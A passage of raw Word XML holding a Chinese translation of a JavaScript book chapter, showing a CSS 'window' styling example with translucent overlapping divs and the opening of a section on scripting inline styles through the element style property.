        <w:t>style type="text/css"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>/**</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*This is a CSS stylesheet that defines three style rules that we use</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">*in the body of the document to create </w:t>
      </w:r>
      <w:r>
        <w:t>a"window"visual effect.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*The rules use positioning properties to set the overall size of the window</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*and the position of its components.Changing the size of the window</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*requires careful changes to positioning properties in all three rules.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>**/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>div.window{/</w:t>
      </w:r>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>指定窗口的尺寸和边框</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>position:absolute;/*position</w:t>
      </w:r>
      <w:r>
        <w:t>在其他地方指定</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>width:300px;height:200px;/*</w:t>
      </w:r>
      <w:r>
        <w:t>窗口尺寸，不含边框</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>border:3px outset gray;/*</w:t>
      </w:r>
      <w:r>
        <w:t>注意</w:t>
      </w:r>
      <w:r>
        <w:t>3D"outset"</w:t>
      </w:r>
      <w:r>
        <w:t>边框效果</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>div.titlebar{/*</w:t>
      </w:r>
      <w:r>
        <w:t>指定标题栏的定位、尺寸和样式</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>position:absolute;/*</w:t>
      </w:r>
      <w:r>
        <w:t>它是定位元素</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>top:0px;height:18px;/*</w:t>
      </w:r>
      <w:r>
        <w:t>标题栏</w:t>
      </w:r>
      <w:r>
        <w:t>18px+</w:t>
      </w:r>
      <w:r>
        <w:t>内边距和边框</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>width:290px;/*290+5</w:t>
      </w:r>
      <w:r>
        <w:t>px</w:t>
      </w:r>
      <w:r>
        <w:t>左、右内边距</w:t>
      </w:r>
      <w:r>
        <w:t>=300*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>background-color:#aaa;/*</w:t>
      </w:r>
      <w:r>
        <w:t>标题栏颜色</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>border-bottom:groove gray 2px;/*</w:t>
      </w:r>
      <w:r>
        <w:t>标题栏只有底部边框</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>padding:3px 5px 2px 5px;/*</w:t>
      </w:r>
      <w:r>
        <w:t>顺时针值</w:t>
      </w:r>
      <w:r>
        <w:t>:top</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>right</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>bottom</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>left*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>font:bold 11pt sans-serif;/*</w:t>
      </w:r>
      <w:r>
        <w:t>标题栏字体</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>div.content{/*</w:t>
      </w:r>
      <w:r>
        <w:t>指定窗口内容的尺寸、定位和滚动</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>position:absolute;/*</w:t>
      </w:r>
      <w:r>
        <w:t>它是定位元素</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>top:25px;/*</w:t>
      </w:r>
      <w:r>
        <w:t>18px</w:t>
      </w:r>
      <w:r>
        <w:t>标题</w:t>
      </w:r>
      <w:r>
        <w:t>+2px</w:t>
      </w:r>
      <w:r>
        <w:t>边框</w:t>
      </w:r>
      <w:r>
        <w:t>+3px+2px</w:t>
      </w:r>
      <w:r>
        <w:t>内边距</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>height:165px;/*200px</w:t>
      </w:r>
      <w:r>
        <w:t>总共</w:t>
      </w:r>
      <w:r>
        <w:t>-25px</w:t>
      </w:r>
      <w:r>
        <w:t>标题栏</w:t>
      </w:r>
      <w:r>
        <w:t>-10px</w:t>
      </w:r>
      <w:r>
        <w:t>内边距</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>width:290px;/*300px</w:t>
      </w:r>
      <w:r>
        <w:t>宽度</w:t>
      </w:r>
      <w:r>
        <w:t>-10px</w:t>
      </w:r>
      <w:r>
        <w:t>内边距</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>padding:5px;/*4</w:t>
      </w:r>
      <w:r>
        <w:t>条边上都有空间</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>overflow:auto;/*</w:t>
      </w:r>
      <w:r>
        <w:t>如果需要显示滚动条</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>background-color:#fff;/*</w:t>
      </w:r>
      <w:r>
        <w:t>默认白色背景</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>div.translucent{/*</w:t>
      </w:r>
      <w:r>
        <w:t>此类让窗口部分透明</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>opacity:.75;/*</w:t>
      </w:r>
      <w:r>
        <w:t>透明度标准样式</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>filter:alpha(opacity=75);/*IE</w:t>
      </w:r>
      <w:r>
        <w:t>的透明度</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</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w:t>
      </w:r>
      <w:r>
        <w:t>定义一个窗口：</w:t>
      </w:r>
      <w:r>
        <w:t>"window"div</w:t>
      </w:r>
      <w:r>
        <w:t>有一个标题栏和</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>其内是一个内容</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>。注意，如何设置定位</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>一个扩充了样式表的</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>div class="window"style="left:10px;top:10px;z-index:10;"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>div class="titlebar"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Test Window</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/div</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">div </w:t>
      </w:r>
      <w:r>
        <w:t>class="content"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>若干行</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>!-</w:t>
      </w:r>
      <w:r>
        <w:t>展示滚动</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/div</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/div</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>定义另一个窗口：用不同的定位、颜色和字体重量</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>div class="window"style="left:75px;top:110px;z-index:20;"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>div class="t</w:t>
      </w:r>
      <w:r>
        <w:t>itlebar"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Another Window</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/div</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>div class="content translucent"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>style="background-color:#ccc;font-weight:bold;"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>This is another window.Its</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>tt</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>z-index</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/tt</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>puts it on top of the other one.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>CSS styles make its content area translucent,in browsers that support</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/div</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/div</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该例子主要的不足是样式表将所有窗口的尺寸固定了。由于窗口的标题栏和内容部分</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>必须</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>在整个窗口中精确地定位，因此一个窗口尺寸的变化需要改变定义在样式表的三条规则中的各种定位</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>属性的值。这对于一个静态</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档很难做到，如果使用脚本来设置所有必要属性值并不是很难。该主题将在下一节中探讨。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="414" w:name="16_3_Jiao_Ben_Hua_Nei_Lian_Yang_Shi_"/>
      <w:r>
        <w:t>16.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　脚本化内联样式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="414"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>脚本化</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>最直截了当的方法就是更改单独的文档元素的</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>属性。类似大多数</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性，</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>也是元素对象的属性，它可以在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中操作。但是</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>属性不同寻常：它的值不是字符串，而是一个</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleDeclaration</w:t>
      </w:r>
      <w:r>
        <w:t>对象。该</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>属性代表了</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>代码中通过</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>指定的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性。例如，让元素</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>的文本变成大号、加粗和蓝色，可以使用如下代码设置</w:t>
      </w:r>
      <w:r>
        <w:t>font-size</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>font-weight</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>color</w:t>
      </w:r>
      <w:r>
        <w:t>等样式属性对应的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.style.fontSize="24pt";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.style.fontWeight="bold";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.style.color="blue";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>名字约定：</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>很多</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式属性（如</w:t>
      </w:r>
